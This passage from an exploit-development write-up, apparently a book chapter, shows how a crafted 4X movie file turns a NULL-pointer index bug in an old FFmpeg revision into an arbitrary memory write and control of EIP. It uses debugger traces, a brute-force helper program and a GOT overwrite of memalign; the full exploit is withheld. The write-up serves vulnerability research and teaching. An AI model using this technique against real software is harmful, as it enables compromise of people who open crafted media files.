To exploit the vulnerability I did the following:
Step 1: Find a sample 4X movie file with a valid strk chunk.
Step 2: Learn about the layout of the strk chunk.
Step 3: Manipulate the strk chunk to crash FFmpeg.
Step 4: Manipulate the strk chunk to get control over EIP.
The vulnerability affects all operating system platforms supported by FFmpeg. The platform that I used throughout this chapter was the default installation of Ubuntu Linux 9.04 (32-bit).
There are different ways to exploit file format bugs. I could either create a file with the right format from scratch or alter an existing file. I chose the latter approach. I used the website http://samples.mplayerhq.hu/ to find a 4X movie file suitable for testing this vulnerability. I could have built a file myself, but downloading a preexisting file is fast and easy.
I downloaded a sample file from that site with the following command:
linux$ wget -q http://samples.mplayerhq.hu/game-formats/4xm/TimeGatep01s01n01a02_2.4xm
After downloading the file, I renamed it original.4xm.
According to the 4X movie file format description, a strk chunk has the following structure:
bytes 0-3 fourcc: 'strk'
bytes 4-7 length of strk structure (40 or 0x28 bytes)
bytes 8-11 track number
bytes 12-15 audio type: 0 = PCM, 1 = 4X IMA ADPCM
bytes 16-35 unknown
bytes 36-39 number of audio channels
bytes 40-43 audio sample rate
bytes 44-47 audio sample resolution (8 or 16 bits)
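The layout above can be turned into a small decoder. The following is a minimal sketch, assuming the fields are stored as 32-bit little-endian values (which is what the AV_RL32 reads in the FFmpeg source suggest). The names strk_info, read_le32, and parse_strk are hypothetical and do not come from FFmpeg.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fields of a strk chunk, named after the format description.
 * Struct and function names are hypothetical, not FFmpeg's. */
struct strk_info {
    uint32_t length;        /* bytes 4-7   */
    uint32_t track_number;  /* bytes 8-11  */
    uint32_t audio_type;    /* bytes 12-15 */
    uint32_t channels;      /* bytes 36-39 */
    uint32_t sample_rate;   /* bytes 40-43 */
    uint32_t sample_bits;   /* bytes 44-47 */
};

/* Read a 32-bit little-endian value from a byte buffer. */
static uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Decode the strk chunk that starts at buf[off].
 * Returns 0 on success, -1 if the buffer is too short
 * or the fourcc is not 'strk'. */
int parse_strk(const unsigned char *buf, size_t len, size_t off,
               struct strk_info *out)
{
    if (len < 48 || off > len - 48)
        return -1;
    if (memcmp(buf + off, "strk", 4) != 0)
        return -1;

    out->length       = read_le32(buf + off + 4);
    out->track_number = read_le32(buf + off + 8);
    out->audio_type   = read_le32(buf + off + 12);
    out->channels     = read_le32(buf + off + 36);
    out->sample_rate  = read_le32(buf + off + 40);
    out->sample_bits  = read_le32(buf + off + 44);
    return 0;
}
```

Note that the sketch deliberately keeps track_number unsigned and performs no range check on it; it only illustrates where each field lives inside the chunk.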
The strk chunk of the downloaded sample file starts at file offset 0x1a6, as shown in Figure 4-4:
Figure 4-4. A strk chunk from the 4X movie sample file I downloaded. The numbers shown are referenced in Table 4-1.
Table 4-1 describes the layout of the strk chunk illustrated in Figure 4-4.
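Table 4-1. Components of strk Chunk Layout Shown in Figure 4-4
Reference | Header offset | Description |
---|---|---|
(1) | &header[i] | fourcc: 'strk' |
(2) | &header[i+4] | length of strk structure (0x28 bytes) |
(3) | &header[i+8] | track number |
(4) | &header[i+12] | audio type |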
To exploit this vulnerability, I knew that I would need to set the values of track number at &header[i+8] (that corresponds to current_track from FFmpeg source code) and audio type at &header[i+12]. If I set the values properly, the value of audio type would be written at the memory location NULL + track number, which is the same as NULL + current_track.
In summary, the (nearly) arbitrary memory write operations from the FFmpeg source code are as follows:
[..]
178 fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]);
179 fourxm->tracks[current_track].channels = AV_RL32(&header[i + 36]);
180 fourxm->tracks[current_track].sample_rate = AV_RL32(&header[i + 40]);
181 fourxm->tracks[current_track].bits = AV_RL32(&header[i + 44]);
[..]
And each corresponds to this pseudo code:
NULL[user_controlled_value].offset = user_controlled_data;
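To make the pseudo code more concrete, here is a minimal sketch of how an array index turns into an address. The struct layout is an assumption: only the field names adpcm, channels, sample_rate, and bits appear in the quoted source, while the field order, the fifth field, and the helper name element_field_addr are chosen for illustration so that each element is 20 bytes and adpcm sits at offset 0x10.

```c
#include <stddef.h>
#include <stdint.h>

/* Assumed element layout: five 32-bit fields, 20 bytes in total.
 * Field order and stream_index are assumptions for illustration. */
struct audio_track {
    int32_t sample_rate;   /* offset 0x00 */
    int32_t bits;          /* offset 0x04 */
    int32_t channels;      /* offset 0x08 */
    int32_t stream_index;  /* offset 0x0c */
    int32_t adpcm;         /* offset 0x10 */
};

/* Address that tracks[index].<field> refers to on a 32-bit target.
 * base is the value of the tracks pointer (0 for a NULL pointer).
 * Unsigned arithmetic wraps modulo 2^32, like a 32-bit address. */
uint32_t element_field_addr(uint32_t base, uint32_t index, uint32_t field_off)
{
    return base + index * (uint32_t)sizeof(struct audio_track) + field_off;
}
```

With base set to 0, the result depends only on the index and the field offset, which is why both the destination and the written value end up under the control of the file's author.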
Compiling FFmpeg:
linux$ ./configure; make
These commands will compile two different binary versions of FFmpeg:
ffmpeg: binary without debugging symbols
ffmpeg_g: binary with debugging symbols
After compiling the vulnerable FFmpeg source code revision 16556, I tried to convert the 4X movie into an AVI file to verify that the compilation was successful and that FFmpeg worked flawlessly.
linux$ ./ffmpeg_g -i original.4xm original.avi
FFmpeg version SVN-r16556, Copyright (c) 2000-2009 Fabrice Bellard, et al.
configuration:
libavutil 49.12. 0 / 49.12. 0
libavcodec 52.10. 0 / 52.10. 0
libavformat 52.23. 1 / 52.23. 1
libavdevice 52. 1. 0 / 52. 1. 0
built on Jan 24 2009 02:30:50, gcc: 4.3.3
Input #0, 4xm, from 'original.4xm':
Duration: 00:00:13.20, start: 0.000000, bitrate: 704 kb/s
Stream #0.0: Video: 4xm, rgb565, 640x480, 15.00 tb(r)
Stream #0.1: Audio: pcm_s16le, 22050 Hz, stereo, s16, 705 kb/s
Output #0, avi, to 'original.avi':
Stream #0.0: Video: mpeg4, yuv420p, 640x480, q=2-31, 200 kb/s, 15.00 tb(c)
Stream #0.1: Audio: mp2, 22050 Hz, stereo, s16, 64 kb/s
Stream mapping:
Stream #0.0 -> #0.0
Stream #0.1 -> #0.1
Press [q] to stop encoding
frame= 47 fps= 0 q=2.3 Lsize= 194kB time=3.08 bitrate= 515.3kbits/s
video:158kB audio:24kB global headers:0kB muxing overhead 6.715897%
Next, I modified the values of track number as well as audio type in the strk chunk of the sample file.
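A modification like this can be done in any hex editor. As a rough sketch of the same edit in code, assuming the file has been loaded into memory, the chunk starts at file offset 0x1a6, and the fields are little-endian, the two values land at offsets 0x1a6 + 8 and 0x1a6 + 12. The names write_le32 and patch_strk are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

#define STRK_OFFSET        0x1a6u  /* start of the strk chunk in the sample file */
#define TRACK_NUMBER_FIELD 8u      /* bytes 8-11 of the chunk  */
#define AUDIO_TYPE_FIELD   12u     /* bytes 12-15 of the chunk */

/* Store a 32-bit value in little-endian order at buf[off].
 * Returns 0 on success, -1 if the write would leave the buffer. */
int write_le32(unsigned char *buf, size_t len, size_t off, uint32_t value)
{
    if (len < 4 || off > len - 4)
        return -1;
    buf[off]     = (unsigned char)(value & 0xffu);
    buf[off + 1] = (unsigned char)((value >> 8) & 0xffu);
    buf[off + 2] = (unsigned char)((value >> 16) & 0xffu);
    buf[off + 3] = (unsigned char)((value >> 24) & 0xffu);
    return 0;
}

/* Overwrite track number and audio type in an in-memory copy of the file. */
int patch_strk(unsigned char *file, size_t len,
               uint32_t track_number, uint32_t audio_type)
{
    if (write_le32(file, len, STRK_OFFSET + TRACK_NUMBER_FIELD, track_number) != 0)
        return -1;
    return write_le32(file, len, STRK_OFFSET + AUDIO_TYPE_FIELD, audio_type);
}
```

Reading the file into a buffer and writing the patched copy back out is left to the caller.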
As illustrated in Figure 4-5, I changed the value of track number to 0xaaaaaaaa (1) and the value of audio type to 0xbbbbbbbb (2). I named the new file poc1.4xm and tried to convert it with FFmpeg (see Section B.4 for a description of the following debugger commands).
Figure 4-5. The strk chunk of the sample file after I altered it. The changes I made are highlighted and framed, and the numbers shown are referenced in the text above.
linux$ gdb ./ffmpeg_g
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) set disassembly-flavor intel
(gdb) run -i poc1.4xm
Starting program: /home/tk/BHD/ffmpeg/ffmpeg_g -i poc1.4xm
FFmpeg version SVN-r16556, Copyright (c) 2000-2009 Fabrice Bellard, et al.
configuration:
libavutil 49.12. 0 / 49.12. 0
libavcodec 52.10. 0 / 52.10. 0
libavformat 52.23. 1 / 52.23. 1
libavdevice 52. 1. 0 / 52. 1. 0
built on Jan 24 2009 02:30:50, gcc: 4.3.3

Program received signal SIGSEGV, Segmentation fault.
0x0809c89d in fourxm_read_header (s=0x8913330, ap=0xbf8b6c24) at libavformat/4xm.c:178
178 fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]);
As expected, FFmpeg crashed with a segmentation fault at source code line 178. I further analyzed the FFmpeg process within the debugger to see what exactly caused the crash.
(gdb) info registers
eax 0xbbbbbbbb -1145324613
ecx 0x891c400 143770624
edx 0x0 0
ebx 0xaaaaaaaa -1431655766
esp 0xbf8b6aa0 0xbf8b6aa0
ebp 0x55555548 0x55555548
esi 0x891c3c0 143770560
edi 0x891c340 143770432
eip 0x809c89d 0x809c89d <fourxm_read_header+509>
eflags 0x10207 [ CF PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
At the time of the crash, the registers EAX and EBX were filled with the values that I input for audio type (0xbbbbbbbb) and track number (0xaaaaaaaa). Next, I asked the debugger to display the last instruction executed by FFmpeg:
(gdb) x/1i $eip
0x809c89d <fourxm_read_header+509>: mov DWORD PTR [edx+ebp*1+0x10],eax
As the debugger output shows, the instruction that caused the segmentation fault was attempting to write the value 0xbbbbbbbb at an address calculated using my value for track number.
To control the memory write, I needed to know how the destination address of the write operation was calculated. I found the answer by looking at the following assembly code:
(gdb) x/7i $eip - 21
0x809c888 <fourxm_read_header+488>: lea ebp,[ebx+ebx*4]
0x809c88b <fourxm_read_header+491>: mov eax,DWORD PTR [esp+0x34]
0x809c88f <fourxm_read_header+495>: mov edx,DWORD PTR [esi+0x10]
0x809c892 <fourxm_read_header+498>: mov DWORD PTR [esp+0x28],ebp
0x809c896 <fourxm_read_header+502>: shl ebp,0x2
0x809c899 <fourxm_read_header+505>: mov eax,DWORD PTR [ecx+eax*1+0xc]
0x809c89d <fourxm_read_header+509>: mov DWORD PTR [edx+ebp*1+0x10],eax
These instructions correspond to the following C source line:
[..]
178 fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]);
[..]
Table 4-2 explains the results of these instructions.
Since EBX contains the value I supplied for current_track and EDX contains the NULL pointer of fourxm->tracks, the calculation can be expressed as this:
edx + ((ebx + ebx * 4) << 2) + 0x10 = destination address of the write operation
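Table 4-2. List of the Assembler Instructions and the Result of Each Instruction
Instruction | Result |
---|---|
lea ebp,[ebx+ebx*4] | ebp = ebx + ebx * 4 (EBX contains the user-supplied value of current_track, 0xaaaaaaaa) |
mov eax,DWORD PTR [esp+0x34] | eax = array index i |
mov edx,DWORD PTR [esi+0x10] | edx = fourxm->tracks |
shl ebp,0x2 | ebp = ebp << 2 |
mov eax,DWORD PTR [ecx+eax*1+0xc] | eax = AV_RL32(&header[i + 12]) |
mov DWORD PTR [edx+ebp*1+0x10],eax | fourxm->tracks[current_track].adpcm = eax |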
Or in a more simplified form:
edx + (ebx * 20) + 0x10 = destination address of the write operation
I supplied the value 0xaaaaaaaa for current_track (EBX register), so the calculation should look like this:
NULL + (0xaaaaaaaa * 20) + 0x10 = 0x55555558
The result of 0x55555558 can be confirmed with the help of the debugger:
(gdb) x/1x $edx+$ebp+0x10
0x55555558: Cannot access memory at address 0x55555558
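The same arithmetic can be replayed outside the debugger. The sketch below mirrors the three relevant instructions of the disassembly using 32-bit unsigned arithmetic, which wraps around exactly like the registers do; the function name write_destination is hypothetical.

```c
#include <stdint.h>

/* Replays the address calculation of the faulting instruction.
 * edx: value of the fourxm->tracks pointer (0 in the crash above)
 * ebx: value supplied for current_track */
uint32_t write_destination(uint32_t edx, uint32_t ebx)
{
    uint32_t ebp = ebx + ebx * 4u;   /* lea ebp,[ebx+ebx*4]  */
    ebp <<= 2;                       /* shl ebp,0x2          */
    return edx + ebp + 0x10u;        /* [edx+ebp*1+0x10]     */
}
```

For edx = 0 and ebx = 0xaaaaaaaa, the intermediate value of ebp is 0x55555548, which matches the EBP register in the crash dump, and the function returns 0x55555558.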
The vulnerability allowed me to overwrite nearly arbitrary memory addresses with any 4-byte value. To gain control of the execution flow of FFmpeg, I had to overwrite a memory location that would allow me to control the EIP register. I had to find a stable address, one that was predictable within the address space of FFmpeg. That ruled out all stack addresses of the process. But the Executable and Linkable Format (ELF) used by Linux provides an almost perfect target: the Global Offset Table (GOT). Every library function used in FFmpeg has a reference in the GOT. By manipulating GOT entries, I could easily gain control of the execution flow (see Section A.4). The good thing about the GOT is that it’s predictable, which is exactly what I needed. I could gain control of EIP by overwriting the GOT entry of a library function that is called after the vulnerability happens.
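Why a single overwritten table entry redirects execution can be illustrated with a toy model. This is only an analogy, not how the dynamic linker is implemented: a one-entry table of function pointers stands in for a GOT slot, and all names in it are hypothetical.

```c
typedef int (*slot_fn)(void);

/* Stands in for the real library function. */
int original_target(void) { return 1; }

/* Stands in for whatever address ends up in the slot after the write. */
int replaced_target(void) { return 2; }

/* One-entry table playing the role of a GOT slot. */
static slot_fn slot_table[1] = { original_target };

/* Callers never jump to the function directly; they go through the slot. */
int call_via_slot(void)
{
    return slot_table[0]();
}

/* Models a 4-byte write that lands on the slot. */
void overwrite_slot(slot_fn new_target)
{
    slot_table[0] = new_target;
}
```

Before overwrite_slot() is called, call_via_slot() returns 1; afterward, the very same call site returns 2, because the next call picks up whatever address the slot holds at that moment.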
So, what library function is called after the arbitrary memory writes? To answer this question, I had a look at the source code again:
libavformat/4xm.c
fourxm_read_header()
[..]
184 /* allocate a new AVStream */
185 st = av_new_stream(s, current_track);
[..]
Directly after the four memory-write operations, a new AVStream is allocated using the function av_new_stream().
libavformat/utils.c
av_new_stream()
[..]
2271 AVStream *av_new_stream(AVFormatContext *s, int id)
2272 {
2273     AVStream *st;
2274     int i;
2275
2276     if (s->nb_streams >= MAX_STREAMS)
2277         return NULL;
2278
2279     st = av_mallocz(sizeof(AVStream));
[..]
In line 2279 another function named av_mallocz() is called.
libavutil/mem.c
av_mallocz() and av_malloc()
[..]
43 void *av_malloc(unsigned int size)
44 {
45     void *ptr = NULL;
46 #ifdef CONFIG_MEMALIGN_HACK
47     long diff;
48 #endif
49
50     /* let's disallow possible ambiguous cases */
51     if(size > (INT_MAX-16) )
52         return NULL;
53
54 #ifdef CONFIG_MEMALIGN_HACK
55     ptr = malloc(size+16);
56     if(!ptr)
57         return ptr;
58     diff= ((-(long)ptr - 1)&15) + 1;
59     ptr = (char*)ptr + diff;
60     ((char*)ptr)[-1]= diff;
61 #elif defined (HAVE_POSIX_MEMALIGN)
62     posix_memalign(&ptr,16,size);
63 #elif defined (HAVE_MEMALIGN)
64     ptr = memalign(16,size);
[..]
135 void *av_mallocz(unsigned int size)
136 {
137     void *ptr = av_malloc(size);
138     if (ptr)
139         memset(ptr, 0, size);
140     return ptr;
141 }
[..]
In line 137 the function av_malloc() is called, and it calls memalign() in line 64 (the other ifdef cases, in lines 54 and 61, are not defined when using the Ubuntu Linux 9.04 platform). I was excited to see memalign() because it was exactly what I was looking for: a library function that’s called directly after the vulnerability happens (see Figure 4-6).
That brought me to the next question: What is the address of the GOT entry of memalign() in FFmpeg?
I gained this information with the help of objdump:
linux$ objdump -R ffmpeg_g | grep memalign
08560204 R_386_JUMP_SLOT posix_memalign
So the address I had to overwrite was 0x08560204. All I had to do was calculate an appropriate value for track number (current_track). I could get that value in either of two ways: I could try to calculate it, or I could use brute force. I chose the easy option and wrote the following program:
Example 4-1. Little helper program to use brute force to find the appropriate value for current_track (addr_brute_force.c)
01 #include <stdio.h>
02
03 // GOT entry address of memalign()
04 #define MEMALIGN_GOT_ADDR 0x08560204
05
06 // Min and max value for 'current_track'
07 #define SEARCH_START 0x80000000
08 #define SEARCH_END 0xFFFFFFFF
09
10 int
11 main (void)
12 {
13     unsigned int a, b = 0;
14
15     for (a = SEARCH_START; a < SEARCH_END; a++) {
16         b = (a * 20) + 0x10;
17         if (b == MEMALIGN_GOT_ADDR) {
18             printf ("Value for 'current_track': %08x\n", a);
19             return 0;
20         }
21     }
22
23     printf ("No valid value for 'current_track' found.\n");
24
25     return 1;
26 }
The program illustrated in Example 4-1 uses brute force to find an appropriate track number (current_track) value, which is needed to overwrite the (GOT) address defined in line 4. This is done by trying all possible values for current_track until the result of the calculation (see line 16) matches the searched GOT entry address of memalign() (see line 17). To trigger the vulnerability, current_track has to be interpreted as negative, so only values in the range of 0x80000000 to 0xffffffff are considered (see line 15).
Example:
linux$ gcc -o addr_brute_force addr_brute_force.c
linux$ ./addr_brute_force
Value for 'current_track': 8d378019
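The other option mentioned above, calculating the value directly, is also possible. The following is a sketch under the assumption that the equation to solve is (a * 20) + 0x10 = target modulo 2^32, as in line 16 of the helper program. Since 20 = 4 * 5, the target minus 0x10 must be a multiple of 4, and the remaining factor 5 can be undone with its multiplicative inverse. The function name solve_current_track is hypothetical.

```c
#include <stdint.h>

/* Multiplicative inverse of 5 modulo 2^32: 5 * 0xCCCCCCCD == 1 (mod 2^32). */
#define INV5 0xCCCCCCCDu

/* Solve (a * 20) + 0x10 == target (mod 2^32) for the smallest a
 * in the range 0x80000000..0xffffffff.
 * Returns 0 and stores a in *out, or -1 if no solution exists. */
int solve_current_track(uint32_t target, uint32_t *out)
{
    uint32_t t = target - 0x10u;

    if (t & 3u)
        return -1;                    /* a * 20 is always a multiple of 4 */

    /* Dividing by 4 leaves 5 * a == t / 4 (mod 2^30). */
    uint32_t a = ((t >> 2) * INV5) & 0x3FFFFFFFu;

    /* Solutions repeat every 2^30; setting the top bit selects the
     * smallest one that is negative when read as a signed 32-bit int. */
    *out = a | 0x80000000u;
    return 0;
}
```

For the target 0x08560204 this yields 0x8d378019, the same value the brute-force program prints.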
I then adjusted the sample file and renamed it poc2.4xm.
The only thing I changed was the value of track number (see (1) in Figure 4-7). It now matched the value generated by my little helper program.
I then tested the new proof-of-concept file in the debugger (see Section B.4 for a description of the following debugger commands).
linux$ gdb -q ./ffmpeg_g
(gdb) run -i poc2.4xm
Starting program: /home/tk/BHD/ffmpeg/ffmpeg_g -i poc2.4xm
FFmpeg version SVN-r16556, Copyright (c) 2000-2009 Fabrice Bellard, et al.
configuration:
libavutil 49.12. 0 / 49.12. 0
libavcodec 52.10. 0 / 52.10. 0
libavformat 52.23. 1 / 52.23. 1
libavdevice 52. 1. 0 / 52. 1. 0
built on Jan 24 2009 02:30:50, gcc: 4.3.3

Program received signal SIGSEGV, Segmentation fault.
0xbbbbbbbb in ?? ()
(gdb) info registers
eax 0xbfc1ddd0 -1077813808
ecx 0x9f69400 167154688
edx 0x9f60330 167117616
ebx 0x0 0
esp 0xbfc1ddac 0xbfc1ddac
ebp 0x85601f4 0x85601f4
esi 0x164 356
edi 0x9f60330 167117616
eip 0xbbbbbbbb 0xbbbbbbbb
eflags 0x10293 [ CF AF SF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
Bingo! Full control over EIP. After I gained control over the instruction pointer, I developed an exploit for the vulnerability. I used the VLC media player as an injection vector, because it uses the vulnerable version of FFmpeg.
As I’ve said in previous chapters, the laws in Germany do not allow me to provide a full working exploit, but you can watch a short video I recorded that shows the exploit in action on the book’s website.[41]
Figure 4-8 summarizes the steps I used to exploit the vulnerability. Here is the anatomy of the bug shown in this figure:
The destination address for the memory write is calculated using current_track as an index (NULL + current_track + offset). The value of current_track derives from user-controlled data of the 4xm media file.
The source data of the memory write derives from user-controlled data of the media file.
The user-controlled data is copied to the memory location of the memalign() GOT entry.